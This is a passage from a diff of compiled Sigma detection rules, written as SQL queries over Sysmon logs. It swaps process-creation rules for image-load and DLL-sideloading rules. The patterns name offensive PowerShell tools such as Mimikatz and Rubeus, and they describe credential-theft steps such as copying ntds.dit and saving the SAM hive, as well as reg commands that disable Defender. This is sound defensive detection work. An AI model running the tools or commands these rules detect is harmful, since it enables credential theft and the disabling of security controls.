'%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' 
OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN 
('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 
'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, 
SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + 
"attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE 